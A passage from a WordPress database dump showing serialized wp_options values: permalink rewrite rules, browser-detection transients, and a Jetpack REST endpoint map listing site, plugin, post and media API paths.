]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:76:\"index.php/cookielawinfo/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:76:\"index.php/cookielawinfo/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:57:\"index.php/cookielawinfo/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:40:\"index.php/cookielawinfo/([^/]+)/embed/?$\";s:46:\"index.php?cookielawinfo=$matches[1]&embed=true\";s:44:\"index.php/cookielawinfo/([^/]+)/trackback/?$\";s:40:\"index.php?cookielawinfo=$matches[1]&tb=1\";s:52:\"index.php/cookielawinfo/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?cookielawinfo=$matches[1]&paged=$matches[2]\";s:59:\"index.php/cookielawinfo/([^/]+)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?cookielawinfo=$matches[1]&cpage=$matches[2]\";s:48:\"index.php/cookielawinfo/([^/]+)(?:/([0-9]+))?/?$\";s:52:\"index.php?cookielawinfo=$matches[1]&page=$matches[2]\";s:40:\"index.php/cookielawinfo/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"index.php/cookielawinfo/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"index.php/cookielawinfo/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"index.php/cookielawinfo/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"index.php/cookielawinfo/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"index.php/cookielawinfo/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:42:\"index.php/feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:37:\"index.php/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:30:\"index.php/page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:51:\"index.php/comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:46:\"index.php/comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:54:\"index.php/search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:49:\"index.php/search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:42:\"index.php/search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:24:\"index.php/search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:57:\"index.php/author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:52:\"index.php/author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:45:\"index.php/author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:27:\"index.php/author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:79:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:74:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:67:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:49:\"index.php/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:66:\"index.php/([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:61:\"index.php/([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:54:\"index.php/([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:36:\"index.php/([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:53:\"index.php/([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:48:\"index.php/([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:41:\"index.php/([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:23:\"index.php/([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:57:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:67:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:87:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:82:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:82:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:63:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:50:\"index.php/([0-9]{4})/([0-9]{1,2})/([^/]+)/embed/?$\";s:75:\"index.php?year=$matches[1]&monthnum=$matches[2]&name=$matches[3]&embed=true\";s:54:\"index.php/([0-9]{4})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:69:\"index.php?year=$matches[1]&monthnum=$matches[2]&name=$matches[3]&tb=1\";s:74:\"index.php/([0-9]{4})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&name=$matches[3]&feed=$matches[4]\";s:69:\"index.php/([0-9]{4})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&name=$matches[3]&feed=$matches[4]\";s:62:\"index.php/([0-9]{4})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:82:\"index.php?year=$matches[1]&monthnum=$matches[2]&name=$matches[3]&paged=$matches[4]\";s:69:\"index.php/([0-9]{4})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:82:\"index.php?year=$matches[1]&monthnum=$matches[2]&name=$matches[3]&cpage=$matches[4]\";s:58:\"index.php/([0-9]{4})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&name=$matches[3]&page=$matches[4]\";s:46:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:56:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:76:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:71:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:71:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:52:\"index.php/[0-9]{4}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:61:\"index.php/([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:48:\"index.php/([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:37:\"index.php/.?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"index.php/.?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"index.php/.?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"index.php/.?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"index.php/.?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"index.php/.?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"index.php/(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:30:\"index.php/(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:50:\"index.php/(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:45:\"index.php/(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:38:\"index.php/(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:45:\"index.php/(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:34:\"index.php/(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(13597,'can_compress_scripts','1','yes'),(13789,'_site_transient_timeout_browser_dd1abb62eec136a4e8c8c71697f6c13d','1450335090','yes'),(13790,'_site_transient_browser_dd1abb62eec136a4e8c8c71697f6c13d','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"47.0.2526.73\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(13986,'_site_transient_timeout_browser_4bb91916f710e1a4d9f683daf52d0370','1450376370','yes'),(13987,'_site_transient_browser_4bb91916f710e1a4d9f683daf52d0370','a:9:{s:8:\"platform\";s:4:\"iPad\";s:4:\"name\";s:4:\"iPad\";s:7:\"version\";s:8:\"601.1.46\";s:10:\"update_url\";s:0:\"\";s:7:\"img_src\";s:0:\"\";s:11:\"img_src_ssl\";s:0:\"\";s:15:\"current_version\";s:0:\"\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(13999,'_transient_timeout_endpoint_path_versions','1449773806','no'),(14000,'_transient_endpoint_path_versions','a:42:{s:4:\"mine\";a:1:{i:0;a:4:{s:4:\"path\";s:21:\"/sites/%s/themes/mine\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:6:\"themes\";a:1:{i:0;a:4:{s:4:\"path\";s:16:\"/sites/%s/themes\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:2:\"%s\";a:8:{i:0;a:4:{s:4:\"path\";s:19:\"/sites/%s/themes/%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:1;a:4:{s:4:\"path\";s:21:\"/sites/%s/plugins/%s/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:2;a:4:{s:4:\"path\";s:20:\"/sites/%s/plugins/%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:3;a:4:{s:4:\"path\";s:29:\"/sites/%s/jetpack/modules/%s/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}i:4;a:4:{s:4:\"path\";s:9:\"/sites/%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:5;a:4:{s:4:\"path\";s:24:\"/sites/%s/post-counts/%s\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.2\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:6;a:4:{s:4:\"path\";s:20:\"/sites/%s/invites/%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:7;a:4:{s:4:\"path\";s:28:\"/sites/%s/sharing-buttons/%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:7:\"install\";a:2:{i:0;a:4:{s:4:\"path\";s:27:\"/sites/%s/themes/%s/install\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:1;a:4:{s:4:\"path\";s:28:\"/sites/%s/plugins/%s/install\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:6:\"delete\";a:14:{i:0;a:4:{s:4:\"path\";s:26:\"/sites/%s/themes/%s/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:1;a:4:{s:4:\"path\";s:27:\"/sites/%s/plugins/%s/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:2;a:4:{s:4:\"path\";s:25:\"/sites/%s/posts/%d/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:3;a:4:{s:4:\"path\";s:25:\"/sites/%s/posts/%d/delete\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:4;a:4:{s:4:\"path\";s:25:\"/sites/%s/media/%d/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:5;a:4:{s:4:\"path\";s:25:\"/sites/%s/media/%d/delete\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:6;a:4:{s:4:\"path\";s:28:\"/sites/%s/comments/%d/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:7;a:4:{s:4:\"path\";s:35:\"/sites/%s/categories/slug:%s/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:8;a:4:{s:4:\"path\";s:29:\"/sites/%s/tags/slug:%s/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:9;a:4:{s:4:\"path\";s:25:\"/sites/%s/users/%d/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:10;a:4:{s:4:\"path\";s:27:\"/sites/%s/invites/%s/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:11;a:4:{s:4:\"path\";s:31:\"/sites/%s/connections/%d/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:12;a:4:{s:4:\"path\";s:35:\"/sites/%s/sharing-buttons/%s/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:13;a:4:{s:4:\"path\";s:25:\"/sites/%s/menus/%d/delete\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:7:\"plugins\";a:1:{i:0;a:4:{s:4:\"path\";s:17:\"/sites/%s/plugins\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:6:\"update\";a:2:{i:0;a:4:{s:4:\"path\";s:28:\"/sites/%s/plugins/%s/update/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:1;a:4:{s:4:\"path\";s:21:\"/sites/%s/core/update\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:7:\"modules\";a:1:{i:0;a:4:{s:4:\"path\";s:25:\"/sites/%s/jetpack/modules\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:7:\"updates\";a:1:{i:0;a:4:{s:4:\"path\";s:17:\"/sites/%s/updates\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:10:\"capability\";a:1:{i:0;a:4:{s:4:\"path\";s:23:\"/sites/%s/me/capability\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:4:\"core\";a:1:{i:0;a:4:{s:4:\"path\";s:14:\"/sites/%s/core\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:4:\"sync\";a:1:{i:0;a:4:{s:4:\"path\";s:14:\"/sites/%s/sync\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:11:\"jetpack-log\";a:1:{i:0;a:4:{s:4:\"path\";s:21:\"/sites/%s/jetpack-log\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:17:\"maybe-auto-update\";a:1:{i:0;a:4:{s:4:\"path\";s:27:\"/sites/%s/maybe-auto-update\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:12:\"post-formats\";a:1:{i:0;a:4:{s:4:\"path\";s:22:\"/sites/%s/post-formats\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:14:\"page-templates\";a:1:{i:0;a:4:{s:4:\"path\";s:24:\"/sites/%s/page-templates\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:10:\"post-types\";a:1:{i:0;a:4:{s:4:\"path\";s:20:\"/sites/%s/post-types\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:10:\"shortcodes\";a:1:{i:0;a:4:{s:4:\"path\";s:20:\"/sites/%s/shortcodes\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:6:\"render\";a:2:{i:0;a:4:{s:4:\"path\";s:27:\"/sites/%s/shortcodes/render\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:1;a:4:{s:4:\"path\";s:23:\"/sites/%s/embeds/render\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:6:\"embeds\";a:1:{i:0;a:4:{s:4:\"path\";s:16:\"/sites/%s/embeds\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:8:\"reversal\";a:1:{i:0;a:4:{s:4:\"path\";s:25:\"/sites/%s/embeds/reversal\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}}s:5:\"posts\";a:2:{i:0;a:4:{s:4:\"path\";s:16:\"/sites/%s/posts/\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:1;a:4:{s:4:\"path\";s:16:\"/sites/%s/posts/\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:2:\"%d\";a:10:{i:0;a:4:{s:4:\"path\";s:18:\"/sites/%s/posts/%d\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}i:1;a:4:{s:4:\"path\";s:18:\"/sites/%s/posts/%d\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}i:2;a:4:{s:4:\"path\";s:18:\"/sites/%s/posts/%d\";s:11:\"min_version\";s:3:\"1.2\";s:11:\"max_version\";s:3:\"1.2\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:3;a:4:{s:4:\"path\";s:18:\"/sites/%s/media/%d\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:4;a:4:{s:4:\"path\";s:18:\"/sites/%s/media/%d\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}i:5;a:4:{s:4:\"path\";s:18:\"/sites/%s/media/%d\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:6;a:4:{s:4:\"path\";s:21:\"/sites/%s/comments/%d\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}i:7;a:4:{s:4:\"path\";s:18:\"/sites/%s/users/%d\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}i:8;a:4:{s:4:\"path\";s:24:\"/sites/%s/connections/%d\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:9;a:4:{s:4:\"path\";s:18:\"/sites/%s/menus/%d\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:4:\"POST\";i:1;s:3:\"GET\";}}}s:7:\"name:%s\";a:1:{i:0;a:4:{s:4:\"path\";s:23:\"/sites/%s/posts/name:%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}}s:7:\"slug:%s\";a:4:{i:0;a:4:{s:4:\"path\";s:23:\"/sites/%s/posts/slug:%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:1;a:4:{s:4:\"path\";s:23:\"/sites/%s/posts/slug:%s\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:3:\"GET\";}}i:2;a:4:{s:4:\"path\";s:28:\"/sites/%s/categories/slug:%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}i:3;a:4:{s:4:\"path\";s:22:\"/sites/%s/tags/slug:%s\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:2:{i:0;s:3:\"GET\";i:1;s:4:\"POST\";}}}s:3:\"new\";a:11:{i:0;a:4:{s:4:\"path\";s:19:\"/sites/%s/posts/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:1;a:4:{s:4:\"path\";s:19:\"/sites/%s/posts/new\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:2;a:4:{s:4:\"path\";s:19:\"/sites/%s/posts/new\";s:11:\"min_version\";s:3:\"1.2\";s:11:\"max_version\";s:3:\"1.2\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:3;a:4:{s:4:\"path\";s:19:\"/sites/%s/media/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:1:\"1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:4;a:4:{s:4:\"path\";s:19:\"/sites/%s/media/new\";s:11:\"min_version\";s:3:\"1.1\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:5;a:4:{s:4:\"path\";s:30:\"/sites/%s/posts/%d/replies/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:6;a:4:{s:4:\"path\";s:33:\"/sites/%s/comments/%d/replies/new\";s:11:\"min_version\";s:1:\"0\";s:11:\"max_version\";s:3:\"1.1\";s:15:\"request_methods\";a:1:{i:0;s:4:\"POST\";}}i:7;a:4:{s:4:\"p